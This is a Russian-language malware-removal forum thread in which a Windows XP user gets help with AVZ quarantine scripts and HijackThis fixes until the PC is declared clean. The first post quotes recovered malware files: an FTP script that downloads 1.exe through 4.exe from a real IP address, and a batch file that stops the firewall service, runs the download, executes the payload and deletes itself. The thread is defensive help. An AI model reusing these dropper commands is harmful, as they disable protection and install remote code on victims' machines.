Показано с 1 по 11 из 11.

Вирусы, Появляются новые пользователи (заявка № 96667)

  1. #1
    Junior Member Репутация
    Регистрация
    17.11.2009
    Сообщений
    23
    Вес репутации
    30

    Thumbs up Вирусы, Появляются новые пользователи

    Здравствуйте!
    В последнее время часто хватаем вирусы (несмотря на устанавливаемые обновления лицензионной WinXP и антивирус Avira), периодически на странице входа появляются непонятные новые пользователи.
    Помогите пожалуйста может в системе где то все таки сидит какая то зараза, а то очень не хочется переустанавливать Виндоус и менять IP адрес у провайдера.
    На время выполнения скрипов сейчас интернета нет.
    В папке с виндоусом файлы странного содержания:
    open 122.224.54.14
    1433
    donw
    binary
    get 1.exe
    get 2.exe
    get 3.exe
    get 4.exe
    или
    C:\WINDOWS\system32\sc.exe stop sharedaccess
    C:\WINDOWS\system32\ftp.exe -s:cc1.txt
    2.exe
    2.exe
    del cc1.txt
    del %%0

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для light59
    Регистрация
    14.07.2008
    Адрес
    Пермь
    Сообщений
    5,492
    Вес репутации
    589
    В AVZ - файл - выполнить скрипт
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
     QuarantineFile('sethc.exe','');
     QuarantineFile('C:\WINDOWS\System32\h.exe','');
     QuarantineFile('C:\WINDOWS\System32\g.exe','');
     QuarantineFile('C:\WINDOWS\System32\f.exe','');
     DeleteFile('C:\WINDOWS\System32\f.exe');
     DeleteFile('C:\WINDOWS\System32\g.exe');
     DeleteFile('C:\WINDOWS\System32\h.exe');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(true);
    end.
    Кмопьютер перезагрузится.
    ПРишлите каранитн, как написано в правилах

    Выполните эту процедуру http://virusinfo.info/showthread.php...newpost&t=3519

  4. #3
    Junior Member Репутация
    Регистрация
    17.11.2009
    Сообщений
    23
    Вес репутации
    30
    Карантин загрузил.
    Загрузил результат скрипта сбора неопознанных и подозрительных файлов
    Файл сохранён как 110129_213947_virusinfo_files_IRA_4d445ef3a4213.zi p
    Размер файла 7229464
    MD5 900efc9bd9a44d61cf41ce6a8a0e3e83

  5. #4
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для light59
    Регистрация
    14.07.2008
    Адрес
    Пермь
    Сообщений
    5,492
    Вес репутации
    589
    логи повторите

  6. #5
    Junior Member Репутация
    Регистрация
    17.11.2009
    Сообщений
    23
    Вес репутации
    30
    Да и при включении выскакивает быстро сообщение на черном фоне о том, что служба брандмауэр/общий доступ к интернету отключается
    При попытке в панели управления включить брандмауэр - включает, но после перезагрузки опять это сообщение и он опять выключается

  7. #6
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.06.2009
    Адрес
    Пермь
    Сообщений
    11,186
    Вес репутации
    527
    Сами прописывали? Если нет, профиксите в HijackThis
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Int ernet Settings,ProxyServer = http=127.0.0.1:2080
    - Выполните скрипт в AVZ
    Код:
    begin
     SearchRootkit(true, true);
     SetAVZGuardStatus(True);
     DeleteFile('%windir%\Tasks\52390.job');
     DeleteFile('%windir%\Tasks\52391.job');
     DeleteFile('%windir%\Tasks\52392.job');
     QuarantineFile('C:\WINDOWS\system32\cgxxj.biz','');
     DeleteFile('C:\WINDOWS\system32\cgxxj.biz');
     RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\HidServ\Parameters','ServiceDll');
     DeleteFile('C:\WINDOWS\System32\f.exe');
     DeleteFile('C:\WINDOWS\System32\g.exe');
     DeleteFile('C:\WINDOWS\System32\h.exe');
     BC_ImportAll;
     ExecuteSysClean;
     ExecuteRepair(9);
     ExecuteWizard('TSW', 2, 2, true);
     ExecuteWizard('SCU', 2, 2, true);
     RegKeyIntParamWrite('HKLM','SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer','NoDriveTypeAutoRun',221);
     BC_Activate;
     RebootWindows(true);
    end.
    После перезагрузки:
    - выполните такой скрипт
    Код:
    begin
      CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
     end.
    - Файл quarantine.zip из папки AVZ загрузите по ссылке Прислать запрошенный карантин вверху темы
    - Сделайте повторные логи по правилам п.2 и 3 раздела Диагностика.(virusinfo_syscheck.zip;hijackthis.log)

  8. #7
    Junior Member Репутация
    Регистрация
    17.11.2009
    Сообщений
    23
    Вес репутации
    30
    Пофиксил, выполнил, загрузил.

  9. #8
    Junior Member Репутация
    Регистрация
    17.11.2009
    Сообщений
    23
    Вес репутации
    30
    Извиняюсь, забыл файлы вложить.

    Как вы считаете если кто-то проникал на компьютер - нужно поменять IP адрес у провайдера (он статический)? И после лечения он не сможет поникнуть?

  10. #9
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для light59
    Регистрация
    14.07.2008
    Адрес
    Пермь
    Сообщений
    5,492
    Вес репутации
    589
    Чисто

    Цитата Сообщение от vityang Посмотреть сообщение
    Как вы считаете если кто-то проникал на компьютер - нужно поменять IP адрес у провайдера (он статический)?
    Смените все пароли. Фаервол настройте... Менять не обязательно.

  11. #10
    Junior Member Репутация
    Регистрация
    17.11.2009
    Сообщений
    23
    Вес репутации
    30
    Спасибо ! ! !
    Попробуем работать дальше.
    Но видно чтo то в Windows все же повреждено - После того как устанавливаешь файервол Comodo - при соединении клиент-банка - выкидывает в синий экран с сообщением об ошибке ndis.sys. После удаления Comodo работает вроде нормально. (Хотя может это проблема Comodo). Переустанавливать из за клиент банка сильно проблемно.

  12. #11
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    953

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 2
    • Обработано файлов: 11
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) vityang, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. постоянно появляются новые маршруты
      От Ivanushka в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 21.10.2011, 12:18
    2. Ответов: 3
      Последнее сообщение: 16.07.2011, 23:46
    3. Ответов: 4
      Последнее сообщение: 17.10.2010, 22:00
    4. появляются новые сервисы
      От liapsus в разделе Помогите!
      Ответов: 18
      Последнее сообщение: 18.08.2009, 12:55
    5. Ответов: 1
      Последнее сообщение: 07.03.2008, 01:35

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00958 seconds with 16 queries